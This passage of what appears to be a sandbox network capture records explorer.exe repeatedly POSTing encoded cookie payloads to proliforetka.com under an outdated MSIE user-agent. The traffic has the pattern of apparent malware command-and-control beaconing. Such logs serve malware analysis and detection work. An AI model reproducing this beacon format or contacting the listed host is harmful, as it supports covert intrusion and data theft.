                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1814&min_rtt=1809&rtt_var=689&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2831&recv_bytes=13348&delivery_rate=1577525&cwnd=206&unsent_bytes=0&cid=89d9ddef29827222&ts=1624&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 50004 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:57:31 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX8MtB7wWZOVm6dxbMApErYHkIrgHPcdkrW3ek7S4VyqTt3UE3hInxs8QLBv+1KAJWQTBDNFxD0J2qpovrJJFzxPO2pL5RTiKelSONlVigVM0+zHw3Cx1xAaPbzLSGgFj/sfURN7nGXOUiFEaGhX9p+NroWtkvLZBaSr470b1XyZIY=
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:57:32 UTC | 810 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:32 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X3lEEghanftMd%2FQRuyxMllypL0iGFZIruYdaGtqCuL1FDSlMPk8cKG7ujWRH7zI4ItA12iObJuoRGO%2FMzhgRGaMCh9Iul0ohOu7Y7OKEx2%2FuTBYM0pIhd9HRka9rF3yShEM3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3873e65c6bd785-CDG
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=85963&min_rtt=85960&rtt_var=32241&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=33959&cwnd=32&unsent_bytes=0&cid=fadfa013f88a6d79&ts=699&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 50005 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:57:33 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0JIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:57:34 UTC | 809 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:34 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IArdc9Qzrns7un1QN9CPVkOYS97T7QVUlRZc5ct1IQa1eaBEZBKsujY%2FILcQa0QqJjPKJ%2FO2Bpx6l9rWXFy1b9L2syPeqZvsm1R4Xge2mpTi%2FJAo26v64KyfNHaELC03Lqk1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3873f2daa572a5-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2027&min_rtt=2027&rtt_var=1013&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4216&recv_bytes=1059&delivery_rate=168542&cwnd=203&unsent_bytes=0&cid=bb23a52b9ba9daa5&ts=792&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 50006 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:57:35 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0JYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:57:36 UTC | 811 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:36 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qXV%2FVLa0qzS0982P3eMSK2VK0dTeFylcZcI1Yk8BAx1KI0rTmz2u9oT4IhYrq2MBmGiNDGTOZA40PvRvqz6O7ER283rXo8Asx1Ab%2BAykB8tv5Q9ltMGF6acZ%2BE94aZJh%2ByK0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3873fff81832dc-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1986&min_rtt=1978&rtt_var=759&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=1425085&cwnd=241&unsent_bytes=0&cid=5632614498f90b6a&ts=767&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.6 | 50008 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:57:38 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0JoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:57:38 UTC | 819 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:38 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ggo2zQRR3g9Hmg%2BR%2BIxQdSpC59mDi7vuLjIAnryQASnr8r9%2Bd08RhI25wxu5VJeezC6rDFj9b0cO926SQDhE%2BYemWEsiPS7xck1qNTn%2BWeVebvZUGVZ%2BD8p1%2F4Jy%2BU9lIgBZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38740f78b00caa-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1584&rtt_var=616&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1746411&cwnd=239&unsent_bytes=0&cid=b2a1fc1c2e653801&ts=757&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.6 | 50009 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 16:57:40 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0J4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
2024-12-17 16:57:41 UTC | 812 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:41 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dySpeG0fi4qEhx4tFbqiIUaLmqwpMdL14FuUJlAlcTBYq77ccocR1EuF24%2F%2BrLVp4FwHbygf2apJaTx1yZsCew9UqRiHcvzHsrW79%2F1v1lcN%2BBbHrPsDBsXT42k8dJHvFO4U"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38741f7ed8432b-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2348&min_rtt=2348&rtt_var=1174&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4218&recv_bytes=1059&delivery_rate=235464&cwnd=189&unsent_bytes=0&cid=bf7c3f87e1d4b381&ts=1052&x=0"


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                17 | 192.168.2.6 | 50010 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-17 16:57:43 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0IIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:44 UTC | 817 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:44 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2vdK%2FrK6ps%2Bkx1rPPg4JNspFvAUPHZy2Xkme%2Br0KCKwQXJ4quY8HqXx9dqbqSGjHqZng9AJlFuqjQhMNQzMKrn%2F1%2Fl4pvMEd5Soj932qVbNbXjzuIt9O4Zj5C8GJD0iJ%2F5MJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38742dfb4a6608-AMS
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=78116&min_rtt=78100&rtt_var=29320&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=37325&cwnd=32&unsent_bytes=0&cid=f2b22200be2e5780&ts=1704&x=0"


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                18 | 192.168.2.6 | 50012 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-17 16:57:46 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0IYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:47 UTC | 813 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:47 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FHRW%2Bp5QHJDCL6ews8k%2B0L1M3uUUGvzn8jPAwee%2BxoySoWoaGpY1dkfgTOWg1BGFBKYnTuBxeyeI5OymBda8%2FsjeMaaDyiUAhuesmdq4IlbhXCVaBuBs8v6ERxeiWuetHDzD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874439c1943a6-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=16917&min_rtt=2532&rtt_var=9703&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=1153238&cwnd=179&unsent_bytes=0&cid=3d0fa03cc7664f1b&ts=756&x=0"


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                19 | 192.168.2.6 | 50013 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-17 16:57:48 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0IoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:49 UTC | 814 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:49 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o0IDVkd9UUkMnkTTT%2BWz7FqGyVUxeX4LktSUNvH3GnCPs8wPsdV2yYMONiichljXs0g76f3U3qZl5yjI%2B%2B2vjUqU632%2B70PD6fXOFUHPHhgGgWlnG78sNoVN%2BLjJClot4BJP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874520d36974a-FRA
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=91088&min_rtt=91076&rtt_var=34177&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=32027&cwnd=32&unsent_bytes=0&cid=c7c07dec6056981e&ts=710&x=0"


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                20 | 192.168.2.6 | 50014 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-17 16:57:51 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0I4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:52 UTC | 811 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:52 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9XrZHT69rvkVDbYCSJ5FSJViXOx2BkwKefjYeRyEVZaz6o114Q70YXCf%2Fh1jfOpICEVShAUrKjyUmq9d%2BdZplN3SX3Kfh4nIRcAARpA0n6DHS1hl%2B2Zpmp8YhcveoK%2FjLzBb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874626c4c4289-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1651&min_rtt=1643&rtt_var=632&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=1709601&cwnd=150&unsent_bytes=0&cid=96d8c75180dff3a8&ts=781&x=0"


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                21 | 192.168.2.6 | 50015 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-17 16:57:53 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0LIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:54 UTC | 815 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:54 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sg%2BBphv2FQsRHgqzFipfDhg%2FKi73A72%2Bk%2FDxFen3vr7nfoR6kFC7SCWv%2B5yKN6A5AHmQadJbpCzx%2FkF3hSZHQi7VoE9HqnqLoTfTNXMPFDBC9wGyy0w6lEl8SISVzHbMpG3d"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3874707af2c330-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1708&rtt_var=647&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1059&delivery_rate=1682027&cwnd=235&unsent_bytes=0&cid=4a4da5f91d86693b&ts=745&x=0"
                                                                                                                                2024-12-17 16:57:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                22 | 192.168.2.6 | 50016 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-17 16:57:55 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX0LYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:56 UTC | 806 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:56 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CDLumQPWHawGEYUm0wvOtsPuyyWGZTzT%2BDKKt9K9p6k6uzHa8l864xsxBeryCpocVJ8ucPjEx5ytA3P2vcmf7y0HrpETXZ4SkeRkNgEktO43O1Z9lnPYl9aY%2BHYWP8RWSPYA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38747d5cd78cc0-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1985&rtt_var=992&sent=6&recv=8&lost=0&retrans=1&sent_bytes=4218&recv_bytes=1059&delivery_rate=296898&cwnd=222&unsent_bytes=0&cid=fcb8d2f99aeb0b5e&ts=790&x=0"
                                                                                                                                2024-12-17 16:57:56 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                23 | 192.168.2.6 | 50017 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-17 16:57:58 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3JIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:57:59 UTC | 814 | IN | HTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:57:58 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ECclHAGdoxxrD7AtASJ4s%2Fo%2FzdvhpNQyJb3Uwgig4mZkC%2F7XPY8vF972reIIJNmo3IhFbUjqfZKdoOpltefb3jE0BclMUlXYNmY%2FEgBoDloLH0fgHndvIuKZ73eLMeUT4AP%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38748dbc17a055-FRA
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=95958&min_rtt=94124&rtt_var=38964&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=26839&cwnd=32&unsent_bytes=0&cid=aaf7c0eb738f522a&ts=999&x=0"
                                                                                                                                2024-12-17 16:57:59 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                24 | 192.168.2.6 | 50018 | 172.67.161.60 | 443 | 4004 | C:\Windows\explorer.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-17 16:58:00 UTC | 421 | OUT | POST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DX3JYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
